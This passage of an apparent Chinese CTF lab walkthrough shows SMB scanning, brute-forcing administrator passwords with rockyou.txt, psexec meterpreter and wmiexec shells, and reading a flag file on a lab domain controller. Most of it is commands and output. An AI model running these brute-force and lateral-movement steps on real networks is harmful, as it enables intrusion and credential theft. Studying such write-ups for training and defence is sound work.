[-] Unknown error: 192.168.93.255:5632 Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1 ["/usr/share/metasploit-framework/lib/rex/post/meterpreter/channel.rb:116:in `create'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb:38:in `open'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:143:in `create_udp_channel'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:96:in `create'", "/usr/share/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:587:in `create'", "/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.52/lib/rex/socket.rb:51:in `create_param'", "/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.52/lib/rex/socket/udp.rb:39:in `create_param'", "/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.52/lib/rex/socket/udp.rb:30:in `create'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/discovery/udp_probe.rb:76:in `block in run_host'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/discovery/udp_probe.rb:66:in `each'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/discovery/udp_probe.rb:66:in `run_host'", "/usr/share/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:124:in `block (2 levels) in run'", "/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'"]
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed


扫描到三台内网主机

192.168.93.10
192.168.93.20
192.168.93.30


2、第二种模块
msf6 auxiliary(scanner/discovery/udp_probe) > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   THREADS  1                yes       The number of concurrent threads (max one per host)


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.93.0-255
rhosts => 192.168.93.0-255
msf6 auxiliary(scanner/smb/smb_version) > set THREADS 5
THREADS => 5
msf6 auxiliary(scanner/smb/smb_version) > run

[-] 192.168.93.0:445      - 192.168.93.0: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.0:139      - 192.168.93.0: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.1:445      - 192.168.93.1: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.2:445      - 192.168.93.2: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.4:445      - 192.168.93.4: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.3:445      - 192.168.93.3: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.5:445      - 192.168.93.5: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.1:139      - 192.168.93.1: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.2:139      - 192.168.93.2: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.4:139      - 192.168.93.4: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.5:139      - 192.168.93.5: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.3:139      - 192.168.93.3: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.6:445      - 192.168.93.6: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.7:445      - 192.168.93.7: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.8:445      - 192.168.93.8: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.9:445      - 192.168.93.9: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[*] 192.168.93.10:445     - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:required) (uptime:1w 2d 19h 13m 13s) (guid:{74fd7a72-fc98-4951-9b1b-01e0f1cf7935}) (authentication domain:TEST)Windows 2012 R2 Datacenter (build:9600) (name:WIN-8GA56TNV3MV) (domain:TEST)
[+] 192.168.93.10:445     -   Host is running SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:required) (uptime:1w 2d 19h 13m 13s) (guid:{74fd7a72-fc98-4951-9b1b-01e0f1cf7935}) (authentication domain:TEST)Windows 2012 R2 Datacenter (build:9600) (name:WIN-8GA56TNV3MV) (domain:TEST)
[-] 192.168.93.6:139      - 192.168.93.6: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.7:139      - 192.168.93.7: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.9:139      - 192.168.93.9: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.8:139      - 192.168.93.8: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.12:445     - 192.168.93.12: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.11:445     - 192.168.93.11: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.13:445     - 192.168.93.13: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.14:445     - 192.168.93.14: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.15:445     - 192.168.93.15: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.12:139     - 192.168.93.12: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.11:139     - 192.168.93.11: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.13:139     - 192.168.93.13: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.14:139     - 192.168.93.14: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.15:139     - 192.168.93.15: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[*] 192.168.93.20:445     - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.0.2) (signatures:optional) (uptime:207w 1d 13h 49m 52s) (guid:{f9644969-0bf4-48c7-ab87-58ba8044ed81}) (authentication domain:TEST)Windows 2008 Datacenter SP2 (build:6003) (name:WIN2008) (domain:TEST)
[+] 192.168.93.20:445     -   Host is running SMB Detected (versions:1, 2) (preferred dialect:SMB 2.0.2) (signatures:optional) (uptime:207w 1d 13h 49m 52s) (guid:{f9644969-0bf4-48c7-ab87-58ba8044ed81}) (authentication domain:TEST)Windows 2008 Datacenter SP2 (build:6003) (name:WIN2008) (domain:TEST)
[-] 192.168.93.16:445     - 192.168.93.16: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.17:445     - 192.168.93.17: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.18:445     - 192.168.93.18: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.19:445     - 192.168.93.19: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.16:139     - 192.168.93.16: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.17:139     - 192.168.93.17: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.18:139     - 192.168.93.18: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.19:139     - 192.168.93.19: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.21:445     - 192.168.93.21: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.22:445     - 192.168.93.22: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.23:445     - 192.168.93.23: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.24:445     - 192.168.93.24: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.25:445     - 192.168.93.25: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.21:139     - 192.168.93.21: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.22:139     - 192.168.93.22: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.23:139     - 192.168.93.23: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.24:139     - 192.168.93.24: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.25:139     - 192.168.93.25: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[*] 192.168.93.0-255:     - Scanned  26 of 256 hosts (10% complete)
[-] 192.168.93.26:445     - 192.168.93.26: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[*] 192.168.93.30:445     - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:213w 4d 10h 36m 33s) (guid:{5cc9a08c-4395-4e1d-95be-f93ec2195144}) (authentication domain:TEST)Windows 7 Professional SP1 (build:7601) (name:WIN7) (domain:TEST)
[+] 192.168.93.30:445     -   Host is running SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:213w 4d 10h 36m 33s) (guid:{5cc9a08c-4395-4e1d-95be-f93ec2195144}) (authentication domain:TEST)Windows 7 Professional SP1 (build:7601) (name:WIN7) (domain:TEST)


还是三台内网主机

192.168.93.10    name:WIN-8GA56TNV3MV  domain:TEST
192.168.93.20    name:WIN2008          domain:TEST
192.168.93.30    name:WIN7             domain:TEST


6、内网攻击

1、密码爆破
使用use auxiliary/scanner/smb/smb_login模块,进行smb爆破192.168.93.10/20/30的密码


msf6 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > show options

Module options (auxiliary/scanner/smb/smb_login):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   ABORT_ON_LOCKOUT   false            yes       Abort the run when an account lockout is detected
   BLANK_PASSWORDS    false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED   5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS       false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS        false            no        Add all passwords in the current database to the list
   DB_ALL_USERS       false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING   none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
   DETECT_ANY_AUTH    false            no        Enable detection of systems accepting any authentication
   DETECT_ANY_DOMAIN  false            no        Detect if domain is required for the specified user
   PASS_FILE                           no        File containing passwords, one per line
   PRESERVE_DOMAINS   true             no        Respect a username that contains a domain name.
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RECORD_GUEST       false            no        Record guest-privileged random logins to the database
   RHOSTS                              yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT              445              yes       The SMB service port (TCP)
   SMBDomain          .                no        The Windows domain to use for authentication
   SMBPass                             no        The password for the specified username
   SMBUser                             no        The username to authenticate as
   STOP_ON_SUCCESS    false            yes       Stop guessing when a credential works for a host
   THREADS            1                yes       The number of concurrent threads (max one per host)
   USERPASS_FILE                       no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS       false            no        Try the username as the password for all users
   USER_FILE                           no        File containing usernames, one per line
   VERBOSE            true             yes       Whether to print output for all attempts


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/smb/smb_login) > set SMBUser administrator
SMBUser => administrator
msf6 auxiliary(scanner/smb/smb_login) > run

[-] Msf::OptionValidateError The following options failed to validate: RHOSTS
msf6 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.93.30
rhosts => 192.168.93.30
msf6 auxiliary(scanner/smb/smb_login) > run

[*] 192.168.93.30:445     - 192.168.93.10:445 - Starting SMB login bruteforce
[*] 192.168.93.30:445     - Error: 192.168.93.30: Metasploit::Framework::LoginScanner::Invalid Cred details can't be blank, Cred details can't be blank (Metasploit::Framework::LoginScanner::SMB)
[*] 192.168.93.30:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_login) >

这个报错是因为没有加载爆破字典

msf6 auxiliary(scanner/smb/smb_login) > set PASS_FILE /usr/share/wordlists/rockyou.txt
PASS_FILE => /usr/share/wordlists/rockyou.txt

msf6 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.93.30
rhosts => 192.168.93.30
msf6 auxiliary(scanner/smb/smb_login) > run


msf6 auxiliary(scanner/smb/smb_login) > run

[*] 192.168.93.30:445     - 192.168.93.30:445 - Starting SMB login bruteforce
[-] 192.168.93.30:445     - 192.168.93.30:445 - Failed: '.\administrator:This is not a password',
[!] 192.168.93.30:445     - No active DB -- Credential data will not be saved!
[-] 192.168.93.30:445     - 192.168.93.30:445 - Failed: '.\administrator:zxcASDqwe!ASD',
[+] 192.168.93.30:445     - 192.168.93.30:445 - Success: '.\administrator:123qwe!ASD' Administrator


msf6 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.93.20
rhosts => 192.168.93.20
msf6 auxiliary(scanner/smb/smb_login) > run

[*] 192.168.93.20:445     - 192.168.93.20:445 - Starting SMB login bruteforce
[-] 192.168.93.20:445     - 192.168.93.20:445 - Failed: '.\administrator:This is not a password',
[!] 192.168.93.20:445     - No active DB -- Credential data will not be saved!
[-] 192.168.93.20:445     - 192.168.93.20:445 - Failed: '.\administrator:zxcASDqwe!ASD',
[+] 192.168.93.20:445     - 192.168.93.20:445 - Success: '.\administrator:123qwe!ASD' Administrator
^C[*] 192.168.93.20:445     - Caught interrupt from the console...
[*] Auxiliary module execution completed


msf6 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.93.10

msf6 auxiliary(scanner/smb/smb_login) > run

[*] 192.168.93.10:445     - 192.168.93.10:445 - Starting SMB login bruteforce
[-] 192.168.93.10:445     - 192.168.93.10:445 - Failed: '.\administrator:This is not a password',
[!] 192.168.93.10:445     - No active DB -- Credential data will not be saved!
[+] 192.168.93.10:445     - 192.168.93.10:445 - Success: '.\administrator:zxcASDqw123!!' Administrator
^C[*] 192.168.93.10:445     - Caught interrupt from the console...
[*] Auxiliary module execution completed

192.168.93.30  administrator:123qwe!ASD
192.168.93.20  administrator:123qwe!ASD  
192.168.93.10  administrator:zxcASDqw123!!


这样我们就已经拿到所有主机的密码了。

2、psexec工具
利用psexec工具进行攻击内网主机。

192.168.93.30攻击流程

msf6 auxiliary(scanner/smb/smb_login) > use exploit/windows/smb/psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set SMBUser administrator
SMBUser => administrator
msf6 exploit(windows/smb/psexec) > set SMBPass 123qwe!ASD
SMBPass => 123qwe!ASD
msf6 exploit(windows/smb/psexec) > set rhosts 192.168.93.30
rhosts => 192.168.93.30
msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   RHOSTS             192.168.93.30    yes       The target host(s), see https
                                                 ://docs.metasploit.com/docs/u
                                                 sing-metasploit/basics/using-
                                                 metasploit.html
   RPORT              445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTI                   no        Service description to be use
   ON                                            d on target for pretty listin
                                                 g
   SERVICE_DISPLAY_N                   no        The service display name
   AME
   SERVICE_NAME                        no        The service name
   SMBDomain          .                no        The Windows domain to use for
                                                  authentication
   SMBPass            123qwe!ASD       no        The password for the specifie
                                                 d username
   SMBSHARE                            no        The share to connect to, can
                                                 be an admin share (ADMIN$,C$,
                                                 ...) or a normal read/write f
                                                 older share
   SMBUser            administrator    no        The username to authenticate
                                                 as


Payload options (windows/x64/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thr
                                        ead, process, none)
   LPORT     4444             yes       The listen port
   RHOST     192.168.93.30    no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/psexec) > run

[*] 192.168.93.30:445 - Connecting to the server...
[*] 192.168.93.30:445 - Authenticating to 192.168.93.30:445 as user 'administrator'...
[*] 192.168.93.30:445 - Selecting PowerShell target
[*] 192.168.93.30:445 - Executing the payload...
[+] 192.168.93.30:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 192.168.93.30:4444
[*] Sending stage (200774 bytes) to 192.168.93.30
[*] Meterpreter session 5 opened (192.168.93.100:34678 -> 192.168.93.30:4444 via session 4) at 2023-12-04 10:28:38 +0800

meterpreter >



查找域控主机

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run post/windows/gather/enum_domain

[+] Domain FQDN: test.org
[+] Domain NetBIOS Name: TEST
[+] Domain Controller: WIN-8GA56TNV3MV.test.org (IP: 192.168.93.10)
meterpreter >

域控主机为192.168.93.10 

信息收集

meterpreter > shell
Process 1228 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.


C:\Windows\system32>ipconfig /all
ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : win7
   Primary Dns Suffix  . . . . . . . : test.org
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : test.org

Ethernet adapter Bluetooth Network Connection:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Bluetooth Device (Personal Area Network)
   Physical Address. . . . . . . . . : 3C-55-76-DC-AB-F6
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
   Physical Address. . . . . . . . . : 00-0C-29-E0-74-2B
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::fcc9:1e77:245c:9cf3%11(Preferred)
   IPv4 Address. . . . . . . . . . . : 192.168.93.30(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :
   DHCPv6 IAID . . . . . . . . . . . : 234884137
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-2C-53-70-00-0C-29-E0-74-2B
   DNS Servers . . . . . . . . . . . : 192.168.93.10
   NetBIOS over Tcpip. . . . . . . . : Enabled

Tunnel adapter isatap.{9155D380-FF00-44EB-AE88-938EA5D2CAB2}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

Tunnel adapter isatap.{A0E4F0B0-B72B-4DC5-8935-EA51628015E2}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   
   
   
C:\Windows\system32>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Guest

3、wmiexec.py
wmiexec.py 是一个工具,用于在 Windows 操作系统上执行 WMI (Windows Management Instrumentation) 命令和脚本。WMI 是微软 Windows 管理架构的一部分,可用于管理和监控本地和远程计算机上的各种系统资源和服务。

wmiexec.py 工具允许用户在命令行界面上执行各种 WMI 命令和脚本,并与远程计算机进行通信。该工具通常被用于系统管理、故障排除和远程执行任务。


192.168.93.20攻击流程

┌──(root?ru)-[/usr/share/doc/python3-impacket/examples]
└─# proxychains4 python3 wmiexec.py 'administrator:123qwe!ASD@192.168.93.20'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.11.0 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  127.0.0.1:9898  ...  192.168.93.20:445  ...  OK
[*] SMBv2.0 dialect used
[proxychains] Strict chain  ...  127.0.0.1:9898  ...  192.168.93.20:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9898  ...  192.168.93.20:49154  ...  OK
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : win2008
   Primary Dns Suffix  . . . . . . . : test.org
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : test.org

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
   Physical Address. . . . . . . . . : 00-0C-29-AB-44-EC
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::e9c2:7728:85f1:d04f%10(Preferred)
   IPv4 Address. . . . . . . . . . . : 192.168.93.20(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :
   DHCPv6 IAID . . . . . . . . . . . : 234884137
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-2C-55-47-00-0C-29-AB-44-EC
   DNS Servers . . . . . . . . . . . : 192.168.93.10
   NetBIOS over Tcpip. . . . . . . . : Enabled

Tunnel adapter Local Area Connection* 8:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : isatap.{964D2F17-AE7C-4B46-9E2B-EB123D2EEFEA}
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

C:\>net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Guest
The command completed with one or more errors.



192.168.93.10攻击流程

┌──(root?ru)-[/usr/share/doc/python3-impacket/examples]
└─# proxychains python3 wmiexec.py 'administrator:zxcASDqw123!!@192.168.93.10'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.11.0 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  127.0.0.1:9898  ...  192.168.93.10:445  ...  OK
[*] SMBv3.0 dialect used
[proxychains] Strict chain  ...  127.0.0.1:9898  ...  192.168.93.10:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9898  ...  192.168.93.10:49154  ...  OK
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : WIN-8GA56TNV3MV
   Primary Dns Suffix  . . . . . . . : test.org
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : test.org

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection
   Physical Address. . . . . . . . . : 00-0C-29-1F-54-D2
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::1fa:2f8:97ac:1160%12(Preferred)
   IPv4 Address. . . . . . . . . . . : 192.168.93.10(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :
   DHCPv6 IAID . . . . . . . . . . . : 301993001
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-2C-57-BB-00-0C-29-1F-54-D2
   DNS Servers . . . . . . . . . . . : ::1
                                       127.0.0.1
   NetBIOS over Tcpip. . . . . . . . : Enabled

Tunnel adapter isatap.{22AC77BB-4205-4120-89CB-C8F5240403E0}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

C:\>net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Guest                    krbtgt
win2008                  win7
The command completed with one or more errors.

C:\Users\Administrator\Desktop>whoami
test\administrator



ok,利用impacket包里的wmiexec.py脚本成功将内网主机win2008(192.168.93.20)、WIN-8GA56TNV3MV(192.168.93.10 内网主机)打穿了。

7、get flag

┌──(root?ru)-[/usr/share/doc/python3-impacket/examples]
└─# proxychains python3 wmiexec.py 'administrator:zxcASDqw123!!@192.168.93.10'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.11.0 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  127.0.0.1:9898  ...  192.168.93.10:445  ...  OK
[*] SMBv3.0 dialect used
[proxychains] Strict chain  ...  127.0.0.1:9898  ...  192.168.93.10:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9898  ...  192.168.93.10:49154  ...  OK
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is D6DC-065A

 Directory of C:\

08/22/2013  11:52 PM    <DIR>          PerfLogs
10/28/2019  08:44 PM    <DIR>          Program Files
08/22/2013  11:39 PM    <DIR>          Program Files (x86)
10/06/2019  07:14 PM    <DIR>          Users
12/04/2023  11:18 AM    <DIR>          Windows
               0 File(s)              0 bytes
               5 Dir(s)  52,819,361,792 bytes free

C:\>cd Users
C:\Users>dir
 Volume in drive C has no label.
 Volume Serial Number is D6DC-065A

 Directory of C:\Users

10/06/2019  07:14 PM    <DIR>          .
10/06/2019  07:14 PM    <DIR>          ..
10/06/2019  07:14 PM    <DIR>          Administrator
08/22/2013  11:39 PM    <DIR>          Public
               0 File(s)              0 bytes
               4 Dir(s)  52,819,361,792 bytes free

C:\Users>cd Administrator
C:\Users\Administrator>dir
 Volume in drive C has no label.
 Volume Serial Number is D6DC-065A

 Directory of C:\Users\Administrator

10/06/2019  07:14 PM    <DIR>          .
10/06/2019  07:14 PM    <DIR>          ..
10/30/2019  10:12 PM    <DIR>          Contacts
10/31/2019  12:52 AM    <DIR>          Desktop
10/31/2019  12:52 AM    <DIR>          Documents
10/30/2019  10:12 PM    <DIR>          Downloads
10/30/2019  10:12 PM    <DIR>          Favorites
10/30/2019  10:12 PM    <DIR>          Links
10/30/2019  10:12 PM    <DIR>          Music
10/30/2019  10:12 PM    <DIR>          Pictures
10/30/2019  10:12 PM    <DIR>          Saved Games
10/30/2019  10:12 PM    <DIR>          Searches
10/30/2019  10:12 PM    <DIR>          Videos
               0 File(s)              0 bytes
              13 Dir(s)  52,819,357,696 bytes free

C:\Users\Administrator>cd Documents
C:\Users\Administrator\Documents>dir
 Volume in drive C has no label.
 Volume Serial Number is D6DC-065A

 Directory of C:\Users\Administrator\Documents

10/31/2019  12:52 AM    <DIR>          .
10/31/2019  12:52 AM    <DIR>          ..
10/31/2019  12:53 AM                13 flag.txt
               1 File(s)             13 bytes
               2 Dir(s)  52,819,361,792 bytes free

C:\Users\Administrator\Documents>type flag.txt
this is flag!
C:\Users\Administrator\Documents>


最终我们在域控主机内拿到重要文件flag.txt文件。

文章来源:https://blog.csdn.net/rx3225968517/article/details/135334668
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。